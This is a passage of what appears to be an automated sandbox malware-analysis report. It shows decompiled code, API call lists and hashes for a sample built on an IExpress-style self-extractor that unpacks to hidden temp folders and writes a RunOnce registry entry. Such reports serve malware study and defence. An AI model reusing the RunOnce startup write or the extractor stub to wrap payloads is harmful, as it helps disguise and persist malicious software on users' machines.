                                                                      					_t9 = E011D2F1D(_t18, _t20); // executed
                                                                      					_t22 = _t9; // executed
                                                                      					E011D52B6(0, _t18, _t21, _t22); // executed
                                                                      					if(_t22 != 0) {
                                                                      						_t32 =  *0x11d8a3a; // 0x0
                                                                      						if(_t32 == 0) {
                                                                      							_t19 =  *0x11d9a2c; // 0x0
                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                      								E011D1F90(_t19, _t21, _t22);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t6 =  *0x11d8588; // 0x0
                                                                      				if(_t6 != 0) {
                                                                      					CloseHandle(_t6);
                                                                      				}
                                                                      				_t7 =  *0x11d9124; // 0x0
                                                                      				return _t7;
                                                                      			}

                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C03
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C18
                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 011D2C28
                                                                      • CloseHandle.KERNEL32(00000000,?,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 62482547-3460614246
                                                                      • Opcode ID: ab9790060bea6a536fc3f2cde415c496f5deabaa617f35f9cbf9a4fbc30e5c0f
                                                                      • Instruction ID: 5a5fdb4a499e0b79ee568c7714857821c973eb7d877512742ab611ba73bad100
                                                                      • Opcode Fuzzy Hash: ab9790060bea6a536fc3f2cde415c496f5deabaa617f35f9cbf9a4fbc30e5c0f
                                                                      • Instruction Fuzzy Hash: 3011E9712033056BE73CBAF9A888B673B699F442A4B040035FA30D3248DB75DC81C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D6F40() {
                                                                      
                                                                      				SetUnhandledExceptionFilter(E011D6EF0); // executed
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 011D6F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: a7acc0f12de9cbb110ae9bf7ce452908f71724cfffe726ac4234c88e0bb9ba10
                                                                      • Instruction ID: 835613f9326d6420dc11ae62b9e44cadb9789b001f9fad4f51d3c3fa02ac8a54
                                                                      • Opcode Fuzzy Hash: a7acc0f12de9cbb110ae9bf7ce452908f71724cfffe726ac4234c88e0bb9ba10
                                                                      • Instruction Fuzzy Hash: 1890026125311097DA289B71A91951579915E4D5427815474E021C5448DB6040809611
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 93%
                                                                      			E011D202A(struct HINSTANCE__* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v528;
                                                                      				void* _v532;
                                                                      				int _v536;
                                                                      				int _v540;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				long _t36;
                                                                      				long _t41;
                                                                      				struct HINSTANCE__* _t46;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t50;
                                                                      				CHAR* _t54;
                                                                      				void _t56;
                                                                      				signed int _t66;
                                                                      				intOrPtr* _t72;
                                                                      				void* _t73;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr* _t81;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t90;
                                                                      				_Unknown_base(*)()* _t91;
                                                                      				signed int _t93;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      
                                                                      				_t79 = __edx;
                                                                      				_t28 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t28 ^ _t93;
                                                                      				_t84 = 0x104;
                                                                      				memset( &_v268, 0, 0x104);
                                                                      				memset( &_v528, 0, 0x104);
                                                                      				_t95 = _t94 + 0x18;
                                                                      				_t66 = 0;
                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                      				if(_t36 != 0) {
                                                                      					L24:
                                                                      					return E011D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                      				}
                                                                      				_push(_t86);
                                                                      				_t87 = 0;
                                                                      				while(1) {
                                                                      					E011D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                      					_t95 = _t95 + 0x10;
                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                      					if(_t41 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t87 = _t87 + 1;
                                                                      					if(_t87 < 0xc8) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				if(_t87 != 0xc8) {
                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                      					_t79 = _t84;
                                                                      					E011D658A( &_v528, _t84, "advpack.dll");
                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                      					_t84 = _t46;
                                                                      					if(_t84 == 0) {
                                                                      						L10:
                                                                      						if(GetModuleFileNameA( *0x11d9a3c,  &_v268, 0x104) == 0) {
                                                                      							L17:
                                                                      							_t36 = RegCloseKey(_v532);
                                                                      							L23:
                                                                      							_pop(_t86);
                                                                      							goto L24;
                                                                      						}
                                                                      						L11:
                                                                      						_t72 =  &_v268;
                                                                      						_t80 = _t72 + 1;
                                                                      						do {
                                                                      							_t49 =  *_t72;
                                                                      							_t72 = _t72 + 1;
                                                                      						} while (_t49 != 0);
                                                                      						_t73 = _t72 - _t80;
                                                                      						_t81 = 0x11d91e4;
                                                                      						do {
                                                                      							_t50 =  *_t81;
                                                                      							_t81 = _t81 + 1;
                                                                      						} while (_t50 != 0);
                                                                      						_t84 = _t73 + 0x50 + _t81 - 0x11d91e5;
                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x11d91e5);
                                                                      						if(_t90 != 0) {
                                                                      							 *0x11d8580 = _t66 ^ 0x00000001;
                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                      							if(_t66 == 0) {
                                                                      								_t54 = "%s /D:%s";
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      							E011D171E(_t90, _t84, _t54,  &_v268);
                                                                      							_t75 = _t90;
                                                                      							_t23 = _t75 + 1; // 0x1
                                                                      							_t79 = _t23;
                                                                      							do {
                                                                      								_t56 =  *_t75;
                                                                      								_t75 = _t75 + 1;
                                                                      							} while (_t56 != 0);
                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                      							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                      							RegCloseKey(_v532); // executed
                                                                      							_t36 = LocalFree(_t90);
                                                                      							goto L23;
                                                                      						}
                                                                      						_t79 = 0x4b5;
                                                                      						E011D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                      					FreeLibrary(_t84); // executed
                                                                      					if(_t91 == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      						E011D658A( &_v268, 0x104, 0x11d1140);
                                                                      					}
                                                                      					goto L11;
                                                                      				}
                                                                      				_t36 = RegCloseKey(_v532);
                                                                      				 *0x11d8530 = _t66;
                                                                      				goto L23;
                                                                      			}

                                                                      0x011d21fd
                                                                      0x011d21ff
                                                                      0x011d21ff
                                                                      0x011d2204
                                                                      0x011d2213
                                                                      0x011d2218
                                                                      0x011d221d
                                                                      0x011d221d
                                                                      0x011d2220
                                                                      0x011d2220
                                                                      0x011d2222
                                                                      0x011d2223
                                                                      0x011d2229
                                                                      0x011d223d
                                                                      0x011d2249
                                                                      0x011d2250
                                                                      0x00000000
                                                                      0x011d2250
                                                                      0x011d21d2
                                                                      0x011d21d9
                                                                      0x00000000
                                                                      0x011d21d9
                                                                      0x011d213a
                                                                      0x011d2141
                                                                      0x011d2144
                                                                      0x011d214c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2163
                                                                      0x011d2172
                                                                      0x011d2172
                                                                      0x00000000
                                                                      0x011d2163
                                                                      0x011d20ea
                                                                      0x011d20f0
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D2050
                                                                      • memset.MSVCRT ref: 011D205F
                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 011D208C
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D20C9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D20EA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2103
                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2122
                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 011D2134
                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2144
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D215B
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D218C
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D21C1
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D21E4
                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 011D223D
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2249
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2250
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                      • API String ID: 178549006-3765599613
                                                                      • Opcode ID: 27d866dad5f3b5b20713bd1aecbdfea6fd396100647785d8e9b262997c9ea10b
                                                                      • Instruction ID: b6b390474fb73e3e46cc1433336d886a573da4fee7235f78d6cac5bc73203f77
                                                                      • Opcode Fuzzy Hash: 27d866dad5f3b5b20713bd1aecbdfea6fd396100647785d8e9b262997c9ea10b
                                                                      • Instruction Fuzzy Hash: A951D475A02214ABDB3D9B74EC48FEB7B7CEF44700F0042A8FA65E7145DB7199858B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (entry 11d55a0; legend: Executed / Not Executed)
                                                                      C-Code - Quality: 92%
                                                                      			E011D55A0(void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v265;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				int _t32;
                                                                      				int _t33;
                                                                      				int _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t38;
                                                                      				int _t40;
                                                                      				int _t44;
                                                                      				long _t48;
                                                                      				int _t49;
                                                                      				int _t50;
                                                                      				signed int _t53;
                                                                      				int _t54;
                                                                      				int _t59;
                                                                      				char _t60;
                                                                      				int _t65;
                                                                      				char _t66;
                                                                      				int _t67;
                                                                      				int _t68;
                                                                      				int _t69;
                                                                      				int _t70;
                                                                      				int _t71;
                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                      				int _t73;
                                                                      				CHAR* _t82;
                                                                      				CHAR* _t88;
                                                                      				void* _t103;
                                                                      				signed int _t110;
                                                                      
                                                                      				_t28 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t28 ^ _t110;
                                                                      				_t2 = E011D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                      				if(_t109 != 0) {
                                                                      					_t82 = "RUNPROGRAM";
                                                                      					_t32 = E011D468F(_t82, _t109, 1);
                                                                      					__eflags = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                      						__eflags = _t33;
                                                                      						if(_t33 == 0) {
                                                                      							 *0x11d9a30 = 1;
                                                                      						}
                                                                      						LocalFree(_t109);
                                                                      						_t35 =  *0x11d8b3e; // 0x0
                                                                      						__eflags = _t35;
                                                                      						if(_t35 == 0) {
                                                                      							__eflags =  *0x11d8a24; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								L46:
                                                                      								_t101 = 0x7d2;
                                                                      								_t36 = E011D6517(_t82, 0x7d2, 0, E011D3210, 0, 0);
                                                                      								asm("sbb eax, eax");
                                                                      								_t38 =  ~( ~_t36);
                                                                      							} else {
                                                                      								__eflags =  *0x11d9a30; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t109 = 0x11d91e4;
                                                                      									_t40 = GetTempPathA(0x104, 0x11d91e4);
                                                                      									__eflags = _t40;
                                                                      									if(_t40 == 0) {
                                                                      										L19:
                                                                      										_push(_t82);
                                                                      										E011D1781( &_v268, 0x104, _t82, "A:\\");
                                                                      										__eflags = _v268 - 0x5a;
                                                                      										if(_v268 <= 0x5a) {
                                                                      											do {
                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                      												__eflags = _t109 - 6;
                                                                      												if(_t109 == 6) {
                                                                      													L22:
                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                      													__eflags = _t48 - 0xffffffff;
                                                                      													if(_t48 != 0xffffffff) {
                                                                      														goto L30;
                                                                      													} else {
                                                                      														goto L23;
                                                                      													}
                                                                      												} else {
                                                                      													__eflags = _t109 - 3;
                                                                      													if(_t109 != 3) {
                                                                      														L23:
                                                                      														__eflags = _t109 - 2;
                                                                      														if(_t109 != 2) {
                                                                      															L28:
                                                                      															_t66 = _v268;
                                                                      															goto L29;
                                                                      														} else {
                                                                      															_t66 = _v268;
                                                                      															__eflags = _t66 - 0x41;
                                                                      															if(_t66 == 0x41) {
                                                                      																L29:
                                                                      																_t60 = _t66 + 1;
                                                                      																_v268 = _t60;
                                                                      																goto L42;
                                                                      															} else {
                                                                      																__eflags = _t66 - 0x42;
                                                                      																if(_t66 == 0x42) {
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	_t68 = E011D6952( &_v268);
                                                                      																	__eflags = _t68;
                                                                      																	if(_t68 == 0) {
                                                                      																		goto L28;
                                                                      																	} else {
                                                                      																		__eflags = _t68 - 0x19000;
                                                                      																		if(_t68 >= 0x19000) {
                                                                      																			L30:
                                                                      																			_push(0);
                                                                      																			_t103 = 3;
                                                                      																			_t49 = E011D597D( &_v268, _t103, 1);
                                                                      																			__eflags = _t49;
                                                                      																			if(_t49 != 0) {
                                                                      																				L33:
                                                                      																				_t50 = E011D2630(0,  &_v268, 1);
                                                                      																				__eflags = _t50;
                                                                      																				if(_t50 != 0) {
                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                      																				}
                                                                      																				_t88 =  &_v268;
                                                                      																				E011D658A(_t88, 0x104, "msdownld.tmp");
                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                      																				if(_t53 != 0xffffffff) {
                                                                      																					_t54 = _t53 & 0x00000010;
                                                                      																					__eflags = _t54;
                                                                      																				} else {
                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                      																				}
                                                                      																				__eflags = _t54;
                                                                      																				if(_t54 != 0) {
                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                      																					_push(_t88);
                                                                      																					_t109 = 0x11d91e4;
                                                                      																					E011D1781(0x11d91e4, 0x104, _t88,  &_v268);
                                                                      																					_t101 = 1;
                                                                      																					_t59 = E011D5467(0x11d91e4, 1, 0);
                                                                      																					__eflags = _t59;
                                                                      																					if(_t59 != 0) {
                                                                      																						goto L45;
                                                                      																					} else {
                                                                      																						_t60 = _v268;
                                                                      																						goto L42;
                                                                      																					}
                                                                      																				} else {
                                                                      																					_t60 = _v268 + 1;
                                                                      																					_v265 = 0;
                                                                      																					_v268 = _t60;
                                                                      																					goto L42;
                                                                      																				}
                                                                      																			} else {
                                                                      																				_t65 = E011D2630(0,  &_v268, 1);
                                                                      																				__eflags = _t65;
                                                                      																				if(_t65 != 0) {
                                                                      																					goto L28;
                                                                      																				} else {
                                                                      																					_t67 = E011D597D( &_v268, 1, 1, 0);
                                                                      																					__eflags = _t67;
                                                                      																					if(_t67 == 0) {
                                                                      																						goto L28;
                                                                      																					} else {
                                                                      																						goto L33;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		} else {
                                                                      																			goto L28;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      												goto L47;
                                                                      												L42:
                                                                      												__eflags = _t60 - 0x5a;
                                                                      											} while (_t60 <= 0x5a);
                                                                      										}
                                                                      										goto L43;
                                                                      									} else {
                                                                      										_t101 = 1;
                                                                      										_t69 = E011D5467(0x11d91e4, 1, 3); // executed
                                                                      										__eflags = _t69;
                                                                      										if(_t69 != 0) {
                                                                      											goto L45;
                                                                      										} else {
                                                                      											_t82 = 0x11d91e4;
                                                                      											_t70 = E011D2630(0, 0x11d91e4, 1);
                                                                      											__eflags = _t70;
                                                                      											if(_t70 != 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												_t101 = 1;
                                                                      												_t82 = 0x11d91e4;
                                                                      												_t71 = E011D5467(0x11d91e4, 1, 1);
                                                                      												__eflags = _t71;
                                                                      												if(_t71 != 0) {
                                                                      													goto L45;
                                                                      												} else {
                                                                      													do {
                                                                      														goto L19;
                                                                      														L43:
                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                      														_push(4);
                                                                      														_t101 = 3;
                                                                      														_t82 =  &_v268;
                                                                      														_t44 = E011D597D(_t82, _t101, 1);
                                                                      														__eflags = _t44;
                                                                      													} while (_t44 != 0);
                                                                      													goto L2;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							__eflags = _t35 - 0x5c;
                                                                      							if(_t35 != 0x5c) {
                                                                      								L10:
                                                                      								_t72 = 1;
                                                                      							} else {
                                                                      								__eflags =  *0x11d8b3f - _t35; // 0x0
                                                                      								_t72 = 0;
                                                                      								if(__eflags != 0) {
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      							_t101 = 0;
                                                                      							_t73 = E011D5467(0x11d8b3e, 0, _t72);
                                                                      							__eflags = _t73;
                                                                      							if(_t73 != 0) {
                                                                      								L45:
                                                                      								_t38 = 1;
                                                                      							} else {
                                                                      								_t101 = 0x4be;
                                                                      								E011D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t101 = 0x4b1;
                                                                      						E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						LocalFree(_t109);
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					_t101 = 0x4b5;
                                                                      					E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				L47:
                                                                      				return E011D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                      			}






































                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 011D55CF
                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 011D5638
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D564C
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 011D5620
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D56B9
                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 011D571E
                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 011D5737
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 011D57CD
                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 011D57EF
                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 011D5802
                                                                        • Part of subcall function 011D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 011D2654
                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 011D5830
                                                                        • Part of subcall function 011D6517: FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                        • Part of subcall function 011D6517: LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                        • Part of subcall function 011D6517: DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                        • Part of subcall function 011D6517: FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 011D5878
                                                                        • Part of subcall function 011D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 011D59A8
                                                                        • Part of subcall function 011D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 011D59AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 2436801531-3855382519
                                                                      • Opcode ID: d54a538e5d69b61da33e4128761165da84a3c4d8673257777924fd1ce519cf0d
                                                                      • Instruction ID: 3cd24efe92de9e686ec701185ad634673daf242b1d233e79795f044e8470613c
                                                                      • Opcode Fuzzy Hash: d54a538e5d69b61da33e4128761165da84a3c4d8673257777924fd1ce519cf0d
                                                                      • Instruction Fuzzy Hash: C98149B1A05215AADBBDAA799C80BEA767F9F60344F4400B5E996D3180EF748DC1CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 95%
                                                                      			E011D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t5;
                                                                      				long _t13;
                                                                      				int _t14;
                                                                      				CHAR* _t20;
                                                                      				int _t29;
                                                                      				int _t30;
                                                                      				CHAR* _t32;
                                                                      				signed int _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t5 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t5 ^ _t33;
                                                                      				_t32 = __edx;
                                                                      				_t20 = __ecx;
                                                                      				_t29 = 0;
                                                                      				while(1) {
                                                                      					E011D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                      					_t34 = _t34 + 0x10;
                                                                      					_t29 = _t29 + 1;
                                                                      					E011D1680(_t32, 0x104, _t20);
                                                                      					E011D658A(_t32, 0x104,  &_v268); // executed
                                                                      					RemoveDirectoryA(_t32); // executed
                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                      					if(_t13 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t29 < 0x190) {
                                                                      						continue;
                                                                      					}
                                                                      					L3:
                                                                      					_t30 = 0;
                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                      						_t30 = 1;
                                                                      						DeleteFileA(_t32);
                                                                      						CreateDirectoryA(_t32, 0);
                                                                      					}
                                                                      					L5:
                                                                      					return E011D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                      				}
                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                      				if(_t14 == 0) {
